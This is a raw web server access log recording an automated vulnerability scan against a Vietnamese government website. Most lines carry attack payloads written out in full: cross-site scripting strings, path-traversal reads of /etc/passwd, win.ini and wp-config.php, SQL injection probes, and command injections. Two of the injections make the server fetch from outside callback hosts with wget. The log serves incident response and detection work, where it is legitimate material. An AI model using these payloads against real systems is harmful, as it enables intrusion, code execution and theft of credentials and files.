2023-10-13 03:57:56 103.153.214.94 GET /log type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200
2023-10-13 03:59:07 103.153.214.94 GET /free_time_failed.cgi err_msg=<script>alert(document.domain);</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 200
2023-10-13 04:00:01 103.153.214.94 GET /free_time.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 199
2023-10-13 04:02:24 103.153.214.94 GET /webmail/calendar/minimizer/index.php style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204
2023-10-13 04:02:27 103.153.214.94 GET /webmail/calendar/minimizer/index.php style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 203
2023-10-13 04:03:11 103.153.214.94 GET /phpmyadmin/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 199
2023-10-13 04:03:31 103.153.214.94 GET /cgi-bin/kerbynet Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 199
2023-10-13 04:05:50 103.153.214.94 GET /mobile/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 04:06:51 103.153.214.94 GET /login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 618
2023-10-13 04:06:53 103.153.214.94 POST /Collector/diagnostics/ping - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 200
2023-10-13 04:08:12 103.153.214.94 GET /login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 199
2023-10-13 04:08:15 103.153.214.94 POST /Collector/diagnostics/trace_route - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 198
2023-10-13 04:10:45 103.153.214.94 GET /Collector/storagemgmt/apply data%5B0%5D%5Bhost%5D=%60/bin/wget+http://ckjv7uic8b6p3donsoogbtdihdtdoyzwz.oast.online%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype 443 - 193.123.37.162 - - 200 0 0 204
2023-10-13 04:11:08 103.153.214.94 GET /Collector/nms/addModifyZTDProxy ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://ckjv7uic8b6p3donsoognwwt9r5i5bxmx.oast.online) 443 - 193.123.37.162 - - 200 0 0 202
2023-10-13 04:11:21 103.153.214.94 GET /wan.htm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 198
2023-10-13 04:11:49 103.153.214.94 POST /NateMail.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 198
2023-10-13 04:12:08 103.153.214.94 GET /login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 198
2023-10-13 04:12:11 103.153.214.94 POST /Collector/appliancesettings/applianceSettingsFileTransfer - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 198
2023-10-13 04:12:13 103.153.214.94 GET /talari/app/files/2WfF0YgtHLnLfXjDPyD6bXRUTCo - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 199
2023-10-13 04:14:41 103.153.214.94 GET /login - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 199
2023-10-13 04:15:38 103.153.214.94 GET /WidgetHandler.ashx MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 202
2023-10-13 04:16:10 103.153.214.94 GET /-/media/doo-doo.ashx - 443 - 192.46.208.206 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 http://bcvt.kontum.gov.vn/-/media/doo-doo.ashx 200 0 0 216
2023-10-13 04:16:30 103.153.214.94 GET /wp-content/plugins/adaptive-images/adaptive-images-script.php adaptive-images-settings[source_file]=../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 201
2023-10-13 04:17:08 103.153.214.94 POST /share/page/dologin - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 198
2023-10-13 04:18:53 103.153.214.94 GET /WealthT24/GetImage docDownloadPath=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 200
2023-10-13 04:18:55 103.153.214.94 GET /WealthT24/GetImage docDownloadPath=c:/windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 199
2023-10-13 04:19:03 103.153.214.94 GET /tools/sourceViewer/index.html filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 199
2023-10-13 04:22:54 103.153.214.94 GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php error&error_description=%3Csvg/onload=alert(1)%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 201
2023-10-13 04:23:33 103.153.214.94 GET /base_import/static/c:/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 200
2023-10-13 04:23:35 103.153.214.94 GET /web/static/c:/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 198
2023-10-13 04:23:37 103.153.214.94 GET /base/static/c:/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 197
2023-10-13 04:27:29 103.153.214.94 GET /mobile/error-not-supported-platform.html desktop_url=javascript:alert(1337);//itms:// 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 199
2023-10-13 04:28:44 103.153.214.94 POST /password_change.cgi - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn 405 0 1 201
2023-10-13 04:30:59 103.153.214.94 GET /scripts/wa.exe OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205
2023-10-13 04:31:41 103.153.214.94 GET / rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 205
2023-10-13 04:33:32 103.153.214.94 GET /wp-content/plugins/insert-php/readme.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201
2023-10-13 04:34:21 103.153.214.94 POST /session_login.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 846
2023-10-13 04:34:23 103.153.214.94 POST /rpc.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn/sysinfo.cgi?xnavigation=1 405 0 1 200
2023-10-13 04:34:26 103.153.214.94 POST /session_login.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 846
2023-10-13 04:34:28 103.153.214.94 POST /rpc.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn/sysinfo.cgi?xnavigation=1 405 0 1 197
2023-10-13 04:35:42 103.153.214.94 GET /wpdmpro/list-packages/ orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 201
2023-10-13 04:36:19 103.153.214.94 GET /cgi-bin/login_mgr.cgi C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 200
2023-10-13 04:36:29 103.153.214.94 POST /api/users - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 0 2 214
2023-10-13 04:37:16 103.153.214.94 GET /catalog.php filename=../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 203
2023-10-13 04:39:33 103.153.214.94 GET /action/usermanager.htm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 209
2023-10-13 04:40:36 103.153.214.94 GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 209
2023-10-13 04:40:56 103.153.214.94 GET /wp-content/plugins/checklist/images/checklist-icon.php fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 200
2023-10-13 04:43:19 103.153.214.94 GET /cgi-bin/config.exp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 204
2023-10-13 04:45:22 103.153.214.94 GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 200
2023-10-13 04:46:36 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 202
2023-10-13 04:48:24 103.153.214.94 POST /apply_sec.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 199
2023-10-13 04:48:25 103.153.214.94 POST /apply_sec.cgi - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn/login_pic.asp 405 0 1 198
2023-10-13 04:48:27 103.153.214.94 POST /apply_sec.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 https://bcvt.kontum.gov.vn/login_pic.asp 405 0 1 197
2023-10-13 04:48:37 103.153.214.94 POST /wp-json/visualizer/v1/update-chart - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 203
2023-10-13 04:49:42 103.153.214.94 POST /wp-json/visualizer/v1/upload-data - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 203
2023-10-13 04:51:35 103.153.214.94 GET /admin/ n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 207
2023-10-13 04:52:00 103.153.214.94 POST /admin/ n=language&c=language_general&a=doExportPack 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 201
2023-10-13 04:54:10 103.153.214.94 GET /pages/systemcall.php command=cat%20/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 200
2023-10-13 04:55:16 103.153.214.94 GET /admin/ n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 207
2023-10-13 04:55:21 103.153.214.94 POST /ui/api/v1/ui/auth/login - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 200
2023-10-13 04:56:37 103.153.214.94 GET /osm/REGISTER.cmd - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 199
2023-10-13 04:56:39 103.153.214.94 GET /osm_tiles/REGISTER.cmd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 199
2023-10-13 04:56:53 103.153.214.94 POST /getcfg.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 198
2023-10-13 04:57:47 103.153.214.94 GET /jnoj/web/polygon/problem/viewfile id=1&name=../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 202
2023-10-13 04:58:30 103.153.214.94 GET /solr/admin/cores wt=json 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 199
2023-10-13 04:59:41 103.153.214.94 GET / pum_action=tools_page_tab_system_info 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206
2023-10-13 04:59:43 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 201
2023-10-13 05:02:59 103.153.214.94 POST /servlet/UploadServlet - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 203
2023-10-13 05:03:00 103.153.214.94 GET /test.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 200
2023-10-13 05:04:40 103.153.214.94 GET /api-third-party/download/extdisks../etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 0 0 214
2023-10-13 05:07:18 103.153.214.94 GET /getFavicon host=http://oast.fun/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 202
2023-10-13 05:07:59 103.153.214.94 GET /page/sl_logdl dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 200
2023-10-13 05:08:26 103.153.214.94 POST /admin/auth/reset-password - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 204
2023-10-13 05:12:02 103.153.214.94 GET /MicroStrategyLibrary/auth/ui/loginPage loginMode=alert(document.domain) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201
2023-10-13 05:13:34 103.153.214.94 POST /_syslog.txt - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 198
2023-10-13 05:14:18 103.153.214.94 GET /wp-content/plugins/hmapsprem/views/dashboard/index.php p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 201
2023-10-13 05:15:48 103.153.214.94 GET /Login !'><sVg/OnLoAD=alert`1337`// 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 202
2023-10-13 05:17:29 103.153.214.94 GET /vpns/cfg/smb.conf - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 205
2023-10-13 05:17:31 103.153.214.94 POST /boafrm/formSysCmd - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 201
2023-10-13 05:19:23 103.153.214.94 GET /plus/pass_reset.php L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204
2023-10-13 05:23:00 103.153.214.94 GET /wp-admin/admin.php page=download_report&report=users&status=all 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 204
2023-10-13 05:25:14 103.153.214.94 GET /data/autosuggest-remote.php q="><img%20src=x%20onerror=alert(1)> 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205
2023-10-13 05:25:16 103.153.214.94 GET /admin/data/autosuggest-remote.php q="><img%20src=x%20onerror=alert(1)> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 301 0 0 202
2023-10-13 05:26:34 103.153.214.94 POST /dashboard/uploadID.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 201
2023-10-13 05:27:22 103.153.214.94 GET / search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search&nearby=off&address_lat&address_lng&distance=10&lcats%5B%5D 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 206
2023-10-13 05:28:21 103.153.214.94 POST /pandora_console/index.php login=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 202
2023-10-13 05:28:23 103.153.214.94 POST /pandora_console/index.php sec=netf&sec2=operation/netflow/nf_live_view&pure=0 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 201
2023-10-13 05:30:29 103.153.214.94 GET /query db=db&q=SHOW%20DATABASES 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 200
2023-10-13 05:31:22 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 202
2023-10-13 05:31:25 103.153.214.94 GET /xmlpserver/servlet/adfresource format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 199
2023-10-13 05:31:36 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 202
2023-10-13 05:31:38 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/Slots 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 198
2023-10-13 05:32:30 103.153.214.94 POST /xmlpserver/ReportTemplateService.xls - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 200
2023-10-13 05:34:16 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 224
2023-10-13 05:34:17 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 199
